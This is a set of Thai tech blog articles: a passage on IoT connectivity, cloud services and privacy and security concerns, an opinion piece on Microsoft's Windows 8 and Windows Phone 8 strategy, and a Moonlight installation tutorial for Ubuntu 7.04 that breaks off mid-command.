เป็นผู้บุกเบิกตลาดคอมพิวเตอร์ราคาต่ำกว่า 50 ดอลลาร์ ทุกวันนี้ Raspberry Pi เป็นต้นแบบของสินค้าในประเภทเดียวกันมากมาย บอร์ดพัฒนาขนาดเล็กที่ประสิทธิภาพสูงขึ้นเรื่อยๆ มีขายในราคาต่ำกว่า 50 ดอลลาร์ แม้ทาง Raspberry Pi จะขยับไปทำ Raspberry Pi Zero ที่ราคาเหลือเพียง 5 ดอลลาร์แล้วก็ตาม ทุกวันนี้ Raspberry Pi กลายเป็นสมองให้กับอุปกรณ์รอบตัวเรามากขึ้นเรื่อยๆ ป้ายโฆษณาฉลาด, ระบบกล้องวงจรปิด สามารถใช้ Raspberry Pi ร่วมกับซอฟต์แวร์โอเพนซอร์สจำนวนมากเพื่อสร้างบริการแบบใหม่ๆ ในอนาคต ### การเชื่อมต่อ การเชื่อมต่อเป็นประเด็นสำคัญของอุปกรณ์ IoT ในยุคก่อนหน้านี้ที่เครือข่าย Wi-Fi ยังไม่ครอบคลุมทุกพื้นที่เช่นทุกวันนี้ โลกของเซ็นเซอร์และอุปกรณ์ขนาดเล็กดูจะต้องการเครือข่ายไร้สายมากกว่าคอมพิวเตอร์ทั่วไป (ที่สามารถเชื่อมต่อผ่านสายแลนได้) แนวทางการออกแบบเครือข่ายเซ็นเซอร์ไร้สาย (wireless sensor networks - WSNs) จึงเป็นหัวข้อการวิจัยมาเป็นเวลานาน ความฝันของเครือข่ายเหล่านี้คือเครือข่ายที่สามารถเชื่อมต่อได้เป็นบริเวณกว้าง อาจจะหลายตารางกิโลเมตร โดยมีจุดเชื่อมต่ออินเทอร์เน็ตเพียงไม่กี่จุดเท่านั้น เครือข่ายเหล่านี้อาศัยการส่งต่อข้อมูลระหว่างอุปกรณ์ด้วยกันเพื่อขยายพื้นที่ให้บริการ เช่น สวิตช์ไฟในบ้านต้องทำหน้าที่เป็นเราท์เตอร์ให้กับสวิตช์ตัวอื่นๆ เพื่อให้การส่งข้อมูลแต่ละครั้งกินพลังงานน้อยขณะที่มีระยะให้บริการที่กว้างไกล แต่ความนิยมในอินเทอร์เน็ตไร้สายกลับเพิ่มขึ้นอย่างรวดเร็วในไม่กี่ปีที่ผ่านมาการเชื่อมต่ออินเทอร์เน็ตผ่าน Wi-Fi กลับทำได้โดยง่ายและครอบคลุม รวมถึงเครือข่ายโทรศัพท์มือถือที่ให้บริการได้ในระดับเมืองหรือระดับประเทศโดยแทบไม่มีจุดบอดในจุดที่มีประชากรพอสมควร ทำให้ความฝันในการสร้าง WSN ดูจะไม่จำเป็นเท่าใดนัก บอร์ดพัฒนา เช่น ESP8266 เป็นตัวอย่างแนวโน้มเช่นนี้ที่ชัดเจน เราสามารถเชื่อมต่ออุปกรณ์ขนาดเล็กมากเข้ากับอินเทอร์เน็ตได้ผ่าน Wi-Fi ขณะที่การเชื่อมต่อผ่านเครือข่ายโทรศัพท์มือถือก็เป็นทางเลือกสำคัญจากพื้นที่ให้บริการที่กว้างขวางกว่าเดิม แม้ว่าการเชื่อมต่อผ่านเครือข่ายโทรศัพท์มือถือจะไม่ได้มุ่งเป้าการประหยัดพลังงานในระดับที่ใช้งานได้นานหลายๆ เดือนหรือหลายปีต่อแบตเตอรี่หนึ่งชุด แต่สำหรับการเชื่อมต่อที่ไม่ต้องการการประหยัดพลังงานระดับนั้น เช่น รถยนต์ที่มีแหล่งพลังงานตลอดเวลา การเชื่อมต่อผ่านเครือข่ายโทรศัพท์มือถือก็เป็นทางเลือกที่เหมาะสม สมาร์ตโฟนเองถูกมองว่าเป็นศูนย์กลางของการเชื่อมต่อในยุคหลัง เนื่องจากมันสามารถรันแอปพลิเคชั่นซับซ้อนได้ โดยไม่ต้องกังวลเรื่องพลังงานมากเกินไป และมีช่องทางการเชื่อมต่อที่หลากหลาย โดยเฉพาะ Bluetooth ที่มีการพัฒนามาตรฐาน Bluetooth LE (Low Energy - BLE) เพิ่มเติมเข้า ทำให้เราสามารถเชื่อมต่ออุปกรณ์ที่มีแหล่งพลังงานภายในเพียงเล็กน้อย เช่น เซ็นเซอร์ต่างๆ แล้วส่งข้อมูลจากเซ็นเซอร์เหล่านั้นสู่อินเทอร์เน็ตผ่านทางโทรศัพท์มือถือหรือแม้แต่เกตเวย์อื่นที่ทำงานเป็นตัวเชื่อมระหว่าง BLE และอินเทอร์เน็ต ทุกวันนี้เราสามารถหาเซ็นเซอร์ที่ทำงานผ่าน BLE ได้ไม่ยากนัก อุปกรณ์คอมพิวเตอร์สวมใส่ได้จำนวนมากมักใช้มาตรฐาน BLE เช่น นาฬิกาและเซ็นเซอร์สุขภาพ แต่ความฝันที่เราจะเชื่อมต่อเซ็นเซอร์ขนาดเล็กได้จากทุกที่ในโลกยังคงเป็นความฝันที่หลายบริษัทพยายามทำให้เป็นจริง หากเราทำได้ ในอนาคตเราจะมีเครือข่ายที่ครอบคลุมในระดับเดียวกับโทรศัพท์มือถือ แต่เป็นโปรโตคอลเฉพาะเพื่อการเชื่อมต่อที่ประหยัดพลังงานเป็นอย่างมาก โปรโตคอลเหล่านี้รองรับการเชื่อมต่อที่แบนด์วิดท์ต่ำๆ อาจจะระดับกิโลไบต์ต่อวินาทีเท่านั้น แต่ความได้เปรียบสำคัญคือราคาค่าเชื่อมต่อที่ราคาถูกเป็นอย่างมาก เครือข่าย IoT ที่เริ่มมีการติดตั้งไปแล้ว เช่น Sigfox คาดว่าในการใช้งานโดยทั่วไป เซ็นเซอร์และอุปกรณ์แต่ละชิ้นจะเสียค่าเชื่อมต่อเพียง 1 ดอลลาร์ต่อปี ในปีที่แล้ว Archos ผู้ผลิตสินค้าไอทีในฝรั่งเศสประกาศ[แจกเสาเครือข่าย IoT ให้กับบ้านเรือนในฝรั่งเศสเพื่อสร้างเครือข่ายทั่วประเทศ](https://www.blognone.com/node/73380) คาดว่าเมื่อเครือข่ายติดตั้งเสร็จแล้ว จะมีค่าบริการเพียง 0.5 ยูโรต่ออุปกรณ์ต่อปี ราคาค่าเชื่อมต่อที่ถูกเป็นอย่างยิ่งและครอบคลุมในระดับเดียวกับโทรศัพท์มือถือ และการออกแบบให้รองรับการทำงานที่กินพลังงานต่ำมากๆ น่าจะทำให้เรามีแอปพลิเคชั่นใหม่ๆ รถยนต์ในยุคต่อไปอาจจะรายงานสภาพเครื่องยนต์กลับไปยังศูนย์ให้บริการได้เป็นปกติ ไม่ใช่จำกัดอยู่เฉพาะรุ่นที่มีราคาแพงและเป็นทางเลือกเสริม ราคาค่าเชื่อมต่อที่ถูกมากๆ อาจจะทำให้เราใช้งานเครือข่ายเหล่านี้เชื่อมต่ออุปกรณ์ที่ไม่เคยเชื่อมต่อกับอินเทอร์เน็ต เช่น จักรยาน, เสื้อผ้าเด็ก, สวิตช์ไฟตามถนนหนทาง ฯลฯ มาตรฐานเครือข่าย IoT ยังคงมีการแข่งขันกันในหลายกลุ่มเทคโนโลยี เมื่อปีที่แล้วกลุ่มผู้ผลิตอุปกรณ์เครือข่ายอย่างอินเทล, โนเกีย, และอีริคสันก็[เสนอมาตรฐาน NB-LTE](https://www.blognone.com/node/72465) เพื่อใช้ย่านความถี่แคบๆ มาให้บริการ IoT ทำให้ภายในปี 2016 น่าจะมีมาตรฐานแข่งกันถึง 6 มาตรฐาน ### คลาวด์ ศูนย์กลางแห่งข้อมูล จิ๊กซอว์ชิ้นหนึ่งในการเชื่อมต่ออุปกรณ์เข้าด้วยกันเป็นจำนวนมาก คือ เซิร์ฟเวอร์ที่ควบคุม, จัดเก็บข้อมูล, และประมวลผลจากเซ็นเซอร์ต่างๆ ที่ส่งค่าเข้ามา ในยุคหนึ่งที่เราพูดถึงการวางเซ็นเซอร์ไว้ในอาคารเดียว เราอาจจะวางเซิร์ฟเวอร์ไว้ในอาคารเองเพื่อจัดเก็บข้อมูลและควบคุมอาคารทีละอาคารไป แต่การตั้งเซิร์ฟเวอร์เองหมายถึงเราต้องบำรุงรักษาเซิร์ฟเวอร์เหล่านั้นด้วยตัวเอง การอัพเดตความปลอดภัย และการบำรุงรักษาฮาร์ดแวร์ตามอายุการใช้งานเป็นเรื่องลำบากสำหรับคนจำนวนมาก บริการคลาวด์จึงเข้ามาบุกตลาด IoT อย่างมากในช่วงหลัง ความฝันของบริการเหล่านี้ คือ เมื่อผู้ใช้ซื้ออุปกรณ์มาใหม่ พวกเขาเพียงคอนฟิกค่าเล็กน้อยให้อุปกรณ์เชื่อมต่อเข้ากับผู้ให้บริการ และเริ่มใช้งานได้ในทันที ทุกวันนี้ผู้ให้บริการคลาวด์เริ่มหันมาให้บริการเชื่อมต่อกับอุปกรณ์ IoT โดยเฉพาะ ส่วนมากเป็นเซิร์ฟเวอร์โปรโตคอล MQTT เช่น IBM Bluemix หรือ Amazon Web Service บริการเหล่านี้ยังไม่ได้พร้อมใช้สำหรับผู้ใช้ทั่วไปเสียทีเดียว แม้จะมีโครงสร้างพื้นฐาน เช่น ระบบฐานข้อมูล, มาตรฐานการเชื่อมต่ออุปกรณ์เข้ากับเซิร์ฟเวอร์, และเซิร์ฟเวอร์ประมวลผล แต่การคอนฟิกให้ระบบเป็นตามต้องการ เช่น การเชื่อมต่อหลอดไฟสักหลอดเข้ากับสวิตช์ โดยที่อุปกรณ์ทั้งสองตัวเชื่อมต่ออินเทอร์เน็ตก็ยังต้องอาศัยความรู้ความสามารถพอสมควร แต่โครงสร้างพื้นฐานเหล่านี้ก็เป็นช่องทางให้นักพัฒนาสามารถพัฒนาแอปพลิเคชั่นที่ง่ายพอสำหรับผู้ใช้ทั่วไปในอนาคต ผู้ผลิตฮาร์ดแวร์จีนชื่อดังอย่าง Xiaomi ลงทุนกับการพัฒนาอุปกรณ์ IoT อย่างหนัก อย่างที่เราเห็นความพยายามผลิตชิ้นค้า เช่น เครื่องกรองน้ำ แต่สินค้าสำคัญชิ้นหนึ่งของ Xiaomi คือ Home Kit ที่เป็นชุดเซ็นเซอร์พื้นฐาน เช่น สวิตช์, เซ็นเซอร์ประตู, เซ็นเซอร์ความเคลื่อนไหว, ลำโพง, และหลอดไฟ (ไม่มีในชุด ต้องซื้อเพิ่ม) ชุด Home Kit มาพร้อมกับตัวแอปพลิเคชั่นและบริการเต็มรูปแบบ ผู้ใช้สามารถซื้อชุดสำเร็จมา และเชื่อมต่อเข้ากับบริการของ Xiaomi จากนั้นสามารถคอนฟิกพฤติกรรมง่ายๆ เช่น หากอยู่นอกบ้านและในห้องมีความเคลื่อนไหว ให้แจ้งเตือน หรือกำหนดพฤติกรรมของสวิตช์ให้เป็นการเปิดปิดไฟ ไปจนถึงการเปิดปิดอุปกรณ์เองตามช่วงเวลาที่เราต้องการโดยอัตโนมัติ ### ความน่ากังวลแห่ง IoT ท่ามกลางความฝันอันสวยหรูแห่งยุค IoT ที่กำลังใกล้ความเป็นจริงเข้ามาเรื่อยๆ ความน่ากังวลก็เพิ่มพูนขึ้นไปพร้อมๆ กัน โดยเฉพาะประเด็นความเป็นส่วนตัวและความปลอดภัย ความเป็นส่วนตัวเป็นประเด็นใหญ่ของ IoT ที่คนจำนวนมากตั้งคำถาม ในยุคเครือข่ายสังคมออนไลน์ทุกวันนี้ เราอาจจะได้ยินคำกล่าวว่าหากให้เรื่องใดเป็นเรื่องส่วนตัว อย่าโพสต์เรื่องเหล่านั้นลงอินเทอร์เน็ต แต่ยุค IoT ทุกแง่มุมของชีวิตของเราจะเชื่อมต่อกับอินเทอร์เน็ตตลอดเวลา เช่น เวลาที่เราอยู่ในบ้าน เวลาที่เราเปิดใช้งานอุปกรณ์ต่างๆ อุณหภูมิห้องที่เราตั้งไว้ ทั้งหมดถูกส่งต่อกลับไปยังเซิร์ฟเวอร์ ถูกบันทึกไว้เป็นระยะเวลานานหรืออาจจะไม่มีการตั้งลบข้อมูลออกเลยตลอดกาล เมื่อปลายปี 2015 มี[คดีชนแล้วหนีในสหรัฐฯ](http://www.zdnet.com/article/car-calls-911-after-alleged-hit-and-run-driver-arrested/) โดยหญิงคนหนึ่งขับรถหนีออกจากที่เกิดเหตุหลังจากขับรถชนรถบรรทุก แต่รถของเธอเชื่อมต่อกับเซิร์ฟเวอร์โดยอัตโนมัติเมื่อเกิดอุบัติเหตุ พร้อมกับแจ้งพิกัดที่เกิดเหตุและรุ่นของรถไปยังเจ้าหน้าที่โดยอัตโนมัติ ส่งผลให้เธอถูกจับในที่สุด กรณีเช่นนี้อาจจะมองได้ว่าเป็นข้อดีสำหรับการบันทึกข้อมูลจำนวนมาก แต่หากฐานข้อมูลเหล่านี้ตกถึงมือคนร้าย หรือฐานข้อมูลถูกแฮกแล้วเปิดเผยต่อสาธารณะ ฐานข้อมูลรั่วในอนาคตอาจจะไม่ใช่เพียงอีเมลเรื่องงานเหมือนในสมัยข้อมูลโซนี่รั่วไหล แต่อาจจะหมายถึงทุกแง่มุมของชีวิตของผู้ใช้ทุกคน ความปลอดภัยเป็นอีกประเด็นสำคัญ คอมพิวเตอร์ที่ต้องการความปลอดภัยจำเป็นต้องมีการบำรุงรักษาอย่างต่อเนื่อง มีการดูแลและอัพเดตแพตช์ใหม่ๆ เมื่อมีการค้นพบช่องโหว่ แต่ทุกวันนี้กระบวนการอัพเดตกลับไม่มีประสิทธิภาพนัก คอมพิวเตอร์ขนาดเล็กในบ้าน เช่น เราท์เตอร์จำนวนหลายแสนหลายล้านเครื่องในหลายประเทศไม่มีกระบวนการอัพเดตที่เข้าใจได้ง่ายสำหรับผู้ใช้ทั่วไป ยิ่งกว่านั้นเราท์เตอร์จำนวนมากถูกผู้ผลิตทิ้งให้ไม่มีอัพเดตทั้งที่พบช่องโหว่แล้วเป็นเวลานาน ในยุค IoT จำนวนอุปกรณ์ที่เชื่อมต่อกับอินเทอร์เน็ตจะเพิ่มขึ้นเป็นอย่างมาก เป็นคำถามว่ากระบวนการจัดการกับความปลอดภัยในยุคต่อไปที่มีอุปกรณ์ต้องบำรุงรักษาเพิ่มขึ้นเป็นเท่าทวีเช่นนี้จะมีการจัดการที่ดีขึ้นหรือไม่ หรือเป็นการเปิดช่องโหว่จำนวนมากไว้ทุกซอกทุกมุมในบ้านแทน ผู้ออกแบบซีพียู เช่น ARM พยายามเข้ามาเสนอทางออกสำหรับประเด็นความปลอดภัย ด้วยการออกแพลตฟอร์ม mBed สำหรับการพัฒนาอุปกรณ์ IoT และตัวชิปขนาดเล็กรุ่นใหม่ๆ เองก็มีฟีเจอร์ TrustZone เพื่อรองรับการอัพเดตซอฟต์แวร์โดยอัตโนมัติที่สามารถตรวจสอบที่มาของอัพเดตได้ ส่วนความปลอดภัยในการเชื่อมต่อ ตัวแพลตฟอร์ม mBed เองก็มีไลบรารี mBed TLS เพื่อสนับสนุนให้ผู้พัฒนาเชื่อมต่อแบบเข้ารหัสเสมอตั้งแต่แรก แม้ว่าการที่ ARM เข้ามาเปิดแพลตฟอร์มเช่นนี้ดูจะเป็นทางออกสำหรับความปลอดภัย แต่สุดท้ายผู้ผลิตที่นำเทคโนโลยีเหล่านี้ไปผลิตสินค้าขายก็เป็นผู้รับผิดชอบที่จะต้องอัพเดตซอฟต์แวร์สม่ำเสมอ และส่งอัพเดตให้กับผู้ใช้อย่างทันท่วงที ความน่ากลัวอย่างหนึ่งของยุค IoT คืออุปกรณ์เหล่านี้มักมีอายุการใช้งานที่ยาวนาน ในยุคสมาร์ตโฟน คนทั่วไปอาจจะเปลี่ยนโทรศัพท์มือถือในระยะเวลาเพียง 2-3 ปีเท่านั้น ทำให้ได้รับซอฟต์แวร์ใหม่ทุกครั้งที่ซื้อเครื่องใหม่ ส่วนคนที่ใช้งานนานกว่านั้นก็มักจะใช้งานพื้นฐานที่ไม่เชื่อมต่ออินเทอร์เน็ตมากนัก แต่เครื่องใช้ไฟฟ้าในบ้านอาจจะอยู่ในบ้านนับสิบปี เมื่อถึงยุคที่อุปกรณ์เหล่านี้เชื่อมต่ออินเทอร์เน็ตตลอดเวลาก็เป็นคำถามว่าจะมีผู้ผลิตรายใดกล้าบอกว่าจะซัพพอร์ตซอฟต์แวร์ให้กับอุปกรณ์เหล่านี้ตลอดอายุการใช้งานของมันหรือไม่ ประเด็นความปลอดภัยในอุปกรณ์ IoT ในปี 2015 ที่ผ่านมา [เรื่องใหญ่คือการรายงานช่องโหว่ซอฟต์แวร์ในรถยนต์ GM, Chrysler](https://www.blognone.com/node/72878) ที่ทำให้แฮกเกอร์สามารถเข้าควบคุมรถ ตัดการทำงานเบรกจนกระทั่งรถยนต์เกิดอุบัติเหตุได้ ### ปัจจุบันและอนาคต บทความนี้สรุปรวมถึงความเปลี่ยนแปลงที่กำลังจะเกิดขึ้นในชีวิตประจำวันจากเทคโนโลยี IoT ที่มีการพัฒนาอย่างรวดเร็ว สินค้าเหล่านี้แม้จะได้รับความนิยมมากขึ้นเรื่อยๆ และมีขายแพร่หลายขึ้นแต่ก็ยังเป็นเพียงกลุ่มเล็กๆ ของสินค้าในบ้าน หลอดไฟจำนวนมากยังเป็นหลอดไฟธรรมดา ในเมืองไทยเองแม้แต่ล็อกประตูอิเล็กทรอนิกส์ก็ยังไม่ได้รับความนิยมเป็นวงกว้าง เมื่อถึงจุดหนึ่งที่เทคโนโลยีเหล่านี้กลายเป็นของมาตรฐานที่ทุกบ้านใช้งานกัน รูปแบบการใช้งานจะเป็นรูปแบบใดยังคงเป็นเรื่องที่เราต้องคาดเดากันต่อไปในอนาคต แต่เมื่อถึงวันที่มันได้รับความนิยม เราคงต้องตั้งความหวังกันว่าประเด็นความเป็นส่วนตัวและความปลอดภัยจะถูกวางแนวทางการป้องกันไว้เป็นอย่างดี ก่อนที่จะมีการติดตั้งอุปกรณ์จำนวนไปในทุกบ้านในอนาคต [https://www.blognone.com/node/76562](https://www.blognone.com/node/76562)
# จิ๊กซอของไมโครซอฟท์: Windows 8 และ Windows Phone 8 ช่วงนี้เราเห็นไมโครซอฟท์ปล่อยหมัดออกมาชุดใหญ่ ทั้ง [แท็บเล็ต Surface](http://www.blognone.com/node/33415), [Windows Phone 8](http://www.blognone.com/node/33489) รวมไปถึง[ข่าวหลุดของ Xbox 720](http://www.blognone.com/node/33378) อีกด้วย ถ้าเรามองย้อนกลับไปตอนนี้ เราจะเห็น "จิ๊กซอ" ของไมโครซอฟท์ที่กำลังเริ่มก่อตัวอย่างชัดเจนมากขึ้นเรื่อยๆ และน่ากลัวมากทีเดียว การทำความเข้าใจกับท่าทีของไมโครซอฟท์ในช่วงนี้ ต้องย้อนไปดู "ความตั้งใจ" ของไมโครซอฟท์ช่วงก่อนหน้านี้เสียก่อน ยุทธศาสตร์ที่ไมโครซอฟท์วางไว้ตั้งแต่ปี 2009 โดย Ray Ozzie ซึ่งเป็นผู้สืบทอดตำแหน่งของบิล เกตส์ (ปัจจุบันเขาลาออกไปแล้ว) คือคำว่า "Three Screens and a Cloud" ([อ้างอิง](http://blogs.msdn.com/b/stevecla01/archive/2009/05/21/three-screens-and-a-cloud.aspx), [ภาพประกอบ](http://blogs.msdn.com/b/billzack/archive/2010/01/18/3-screen-the-cloud-in-new-york.aspx)) ยุทธศาสตร์ "Three Screens and a Cloud" ของไมโครซอฟท์พูดถึง "หน้าจอ" สามชนิดได้แก่ โทรศัพท์ พีซี และทีวี บวกกับ "กลุ่มเมฆ" ที่ทุกคนคงเข้าใจกันดีอยู่แล้วว่าเป็นอย่างไร ถึงแม้ว่าหลังจากไมโครซอฟท์ประกาศยุทธศาสตร์นี้แล้ว เราจะเห็นอุปกรณ์ชนิดใหม่อย่าง "แท็บเล็ต" เพิ่มเข้ามา แต่ผมว่าในภาพใหญ่ๆ แล้วมันก็ยังเป็นยุทธศาสตร์ที่ใช้ได้ และตอนนี้เราก็เห็นการเดินเกมของไมโครซอฟท์ตามยุทธศาสตร์นี้ขึ้นมาเป็นรูปเป็นร่างแล้ว - **พีซี/แท็บเล็ต** ซอฟต์แวร์ Windows 8 + แท็บเล็ต Surface - **ทีวี** เกมคอนโซล Xbox + Kinect - **โทรศัพท์** Windows Phone 8 ที่เพิ่งเปิดตัวล่าสุด กรณีของ Windows 8 กับ Windows Phone 8 นั้นไมโครซอฟท์ประกาศออกมาแล้วว่าจะใช้สถาปัตยกรรมร่วมกันหรือ "Shared Windows Core" และน่าจะใช้เทคนิคการพัฒนาซอฟต์แวร์เป็น Windows RT เหมือนกัน ถ้าเราบวกกับข่าวลือของ Xbox 720 ว่าจะใช้สถาปัตยกรรมเดียวกัน เขียนแอพข้ามกันได้ เราจะยิ่งเห็นว่าหน้าจอทั้งสามแบบในโลกของไมโครซอฟท์ จะใช้งานแอพข้ามกันได้หมดในอนาคตอันใกล้นี้ (และทุกอย่างเป็น Metro) หากว่าไมโครซอฟท์สามารถต่อจิ๊กซอได้ครบแผ่น ทำทุกอย่างได้ตามเป้าหมาย จะกลายเป็นแพลตฟอร์มดิจิทัลที่น่ากลัวมากๆ เลยนะครับ เพราะคู่แข่งอย่างแอปเปิลและกูเกิลยังต่อภาพพวกนี้ได้น้อยกว่าไมโครซอฟท์มาก แอปเปิลมีดีเพียงฝั่งโทรศัพท์+แท็บเล็ต (และทำได้ดีมาก) ส่วนคอมพิวเตอร์ถึงแม้ว่าแมคจะมีคุณภาพเป็นที่ยอมรับ แต่ส่วนแบ่งตลาดก็น้อยกว่าวินโดวส์มากๆ ทีวีเองก็ลูกผีลูกคน ส่วนฝั่งกลุ่มเมฆก็ยังแทบไม่มีอะไรเลย มีแต่ iCloud ที่กำลังก่อร่างสร้างตัว กูเกิลเองไปได้ดีในตลาดโทรศัพท์ ตลาดแท็บเล็ตก็มีอิทธิพลบ้าง คอมพิวเตอร์ไม่มีเลย (แต่พยายามแก้เกมด้วย Chrome/Chrome OS ซึ่งเป็นวิธีคิดอีกแบบ) ทีวีทำได้แย่กว่าแอปเปิลด้วยซ้ำ จะมีดีที่ฝั่งกลุ่มเมฆเท่านั้น แต่ไมโครซอฟท์มีครบพร้อมสรรพ ถ้าเอาเฉพาะฝั่งกลุ่มเมฆ ได้แก่ - เซิร์ฟเวอร์จำนวนมหาศาลรันแพลตฟอร์มของไมโครซอฟท์ ทั้ง Windows Server, IIS, MS SQL, Exchange ฯลฯ - กลุ่มเมฆแบบ hosted services มีตระกูล Office 365 - กลุ่มเมฆแบบ public cloud ก็มี Azure ที่กำลังบ่มเพาะอยู่ - ฝั่งเว็บมี Bing, Windows Live, SkyDrive รวมถึง Skype และอาจจะเป็น [Yammer](http://www.blognone.com/node/33349) - ฝั่งความบันเทิงออนไลน์มีแพลตฟอร์ม Xbox Live ที่ดูด Zune เข้ามา หนังเพลงทีวีมาครบ ไมโครซอฟท์อาจทำได้ไม่ดีในบางตลาด แต่ถ้าเทียบสายผลิตภัณฑ์แล้ว ความครบถ้วนมากกว่าคู่แข่งมาก ผมคิดว่าจุดชี้เป็นชี้ตายของไมโครซอฟท์จะอยู่ช่วงปลายปีนี้ เพราะจิ๊กซอ 2 ชิ้นใหญ่ๆ จะถูกวางลงมา ได้แก่ Windows 8 และ Windows Phone 8 ซึ่งถ้าไมโครซอฟท์ทำได้สำเร็จ โมเมนตัมจะไหลไปอยู่กับไมโครซอฟท์ทันที และจากนั้นปีหน้าเราก็น่าจะได้เห็น Xbox 720 เป็นผลิตภัณฑ์ชิ้นสุดท้าย ที่ทำให้ "ไมโครซอฟท์ 2.0" เสร็จสมบูรณ์ การมองไมโครซอฟท์ยุคหน้าจะต้องทิ้งภาพไมโครซอฟท์แบบเดิมๆ ไปให้หมดนะครับ เดสก์ท็อปมีหน้าต่างแบบที่เราเห็นในปัจจุบัน ต้องลืมมันไปให้หมด เปลี่ยนความคิดใหม่เป็น Metro และ WinRT เราจะเห็นการต่อเชื่อมกันของจิ๊กซอของไมโครซอฟท์ที่ชัดเจนขึ้น (ระบบเดสก์ท็อปจะกลายเป็น legacy mode สำหรับงานเฉพาะทางบางอย่างเท่านั้น) สิ่งที่ไมโครซอฟท์ยังไม่ประกาศออกมาคือกระบวนการพัฒนาแอพบน Windows Phone 8 ว่าจะมีความสัมพันธ์อย่างไรกับ WinRT บ้าง แต่ก็น่าจะเดาได้ว่าแอพ WinRT ควรจะทำงานได้ทั้งบน Windows 8 และ Windows Phone 8 โดยแก้ไขเพียงเล็กน้อยเท่านั้น แถมสุดท้ายมันควรจะไปทำงานบน Xbox 720 ได้ด้วย เพราะหลักการทำงานโดยนิ้วสัมผัสนั้นไม่ต่างกัน (อย่าลืมว่าไมโครซอฟท์มี [SmartGlass](http://www.blognone.com/node/33030) ไว้เพื่อการนี้) ส่วนยุทธศาสตร์การทำฮาร์ดแวร์เองเพื่อประสบการณ์ที่ดีกว่าก็เป็นเรื่องน่าสนใจ ไมโครซอฟท์มีบทเรียนมาอย่าง[โชกโชน](http://en.wikipedia.org/wiki/Xbox_360_technical_problems)จาก Xbox และการออกแท็บเล็ต Surface ก็แสดงให้เห็นชัดว่าไมโครซอฟท์จะเดินไปในเส้นทางนี้ (ผมคิดว่ายังมีความเป็นไปได้เหมือนกันที่ไมโครซอฟท์จะเอาให้สุดคือออก Surface Phone ตามมาด้วยอีกในอนาคต) แพลตฟอร์ม WinRT น่าจะได้รับการผลักดันจาก Windows 8 ช่วยให้มันไปรุ่งกับ Windows Phone 8 ด้วย ซึ่งน่าจะส่งผลให้แอพบน Windows Phone 8 เยอะขึ้นอย่างรวดเร็วไปโดยปริยาย (แต่ก็ต้องขอแสดงความเสียใจกับคนใช้ WP7 ณ ปัจจุบันที่อัพเกรดไม่ได้ด้วยเช่นกัน ยุทธศาสตร์การพัฒนาของไมโครซอฟท์เหมาะสมแล้ว แต่ผู้ใช้ซวยจริงๆ) เท่าที่ผมลองใช้ Windows 8 มา ผมพบว่าการใช้งานบนพีซีแบบเดิมๆ ให้ประสบการณ์ที่ไม่ค่อยดีนัก (เพราะมันออกแบบมาสำหรับแท็บเล็ตและอุปกรณ์ไฮบริด) ซึ่งตรงนี้อาจเป็นจุดตายของ Windows 8 ในมุมกลับเช่นกัน ต้องรอดูว่าสุดท้ายแล้วผู้บริโภคจะตอบรับดีแค่ไหน พูดง่ายๆ ว่ายุทธศาสตร์ (strategy) ออกแบบมาอย่างถูกต้องเหมาะสมแล้ว ขึ้นกับการดำเนินงาน (execution) ว่าจะทำได้จริงตามเป้าแค่ไหนเท่านั้น ถ้าผลออกมาดี ไมโครซอฟท์จะไปรุ่งและอาจกลับมายิ่งใหญ่อีกครั้ง แต่ถ้าผลออกมาตรงข้าม เราก็อาจเห็นการสิ้นสุดของไมโครซอฟท์ในตลาดคอนซูเมอร์อีกเหมือนกัน เรื่องนี้ไม่น่าจะนานเกินรอ ปลายปีนี้คงเริ่มรู้เรื่อง และสักกลางปีหน้า ผลชี้ขาดคงเริ่มเด่นชัด
# ทดลองติดตั้ง Moonlight บน Ubuntu 7.04 [Moonlight](http://www.mono-project.com/Moonlight) เป็นโครงการของทีมนักพัฒนา [Mono](http://www.mono-project.com/Main_Page) ที่จะพัฒนาระบบทัดเทียมแบบเปิดต้นรหัส (opensource implementation) ที่เข้ากันได้กับรันไทม์ [Silverlight](http://silverlight.net/) ของไมโครซอฟท์บนแพลตฟอร์มลินุกซ์ เนื่องจากในปัจจุบัน Silverlight สนับสนุนเฉพาะแพลตฟอร์ม Windows และ Mac OS X เท่านั้น ความน่าทึ่งของโครงการนี้อย่างหนึ่งได้แก่ การที่ทีมงานสามารถพัฒนา Moonlight ให้สามารถใช้งานได้ในขั้นต้นได้ในระยะเวลา[เพียง 21 วัน](http://www.blognone.com/node/5008) ! การติดตั้ง Moonlight ในขณะนี้จำเป็นต้องคอมไพล์จากต้นรหัส และต้องการ Mono 1.2.4 ในขณะที่ Mono ที่มาพร้อมกับ Ubuntu 7.04 นั้นเป็นรุ่น 1.2.3 อย่างไรก็ตามเราไม่จำเป็นต้องคอมไพล์ Mono จากต้นรหัสเองเนื่องจากมีผู้ทำแพกเกจสำหรับ Ubuntu รุ่น 7.04 ไว้ให้แล้ว ขั้นตอนการติดตั้งที่จะกล่าวถึงต่อไป อาศัยข้อมูลจากหน้าเว็บดังต่อไปนี้ (ประสมกับการลองผิดลองถูกอีกเล็กน้อย) - [Moonlight](http://www.mono-project.com/Moonlight) - [http://johansoft.blogspot.com](http://johansoft.blogspot.com/2007/07/how-to-install-moonlight-desklets-step.html) - [Google Groups ของ Mono](http://groups.google.com/group/mono-olive/browse_thread/thread/7706c2dac175d4f6/e0c922d8d2c10b40#e0c922d8d2c10b40) ขั้นแรก เพิ่มบรรทัดข้างล่างนี้ลงในแฟ้ม > /etc/apt/sources.list deb http://www.viraptor.info/repo feisty-custombackports contrib > จากนั้น อัปเดตทั้งแหล่งแพกแกจและตัวแพกเกจด้วยคำสั่ง > $ sudo aptitude update$ sudo aptitude dist-upgrade > เมื่ออัปเดตแล้วติดตั้งแพกเกจที่จำเป็นเบื้องต้น ได้แก่ ชุดคอมไพล์โปรแกรมและเอสวีเอ็น : > $ sudo aptitude install build-essential subversion > Mono: > $ sudo aptitude install mono libmono-dev mono-gmcs mono-mcs > GTK+: > $ sudo aptitude install libgtk2.0-dev > FFmpeg: (อาจข้ามได้ถ้าต้องการติดตั้งจากต้นรหัส) > $ sudo aptitude install libavformat-dev libswscale-dev > ALSA: > $ sudo aptitude install libasound2-dev > Mozilla: เลือกลงแพกเกจ > $ sudo aptitude install libxul-dev > หรือ > $ sudo aptitude install libnspr-dev libnss-dev firefox-dev > สร้างสารบบสำหรับต้นรหัส > $ mkdir ~/svn > ดาวน์โหลดและคอมไพล์ติดตั้ง FFmpeg (ขั้นตอนนี้อาจข้ามได้หากติดตั้ง libavformat-dev และ libswscale-dev จากแพกเกจ) > $ cd ~/svn && svn checkout svn://svn.mplayerhq.hu/ffmpeg/trunk ffmpeg $ cd 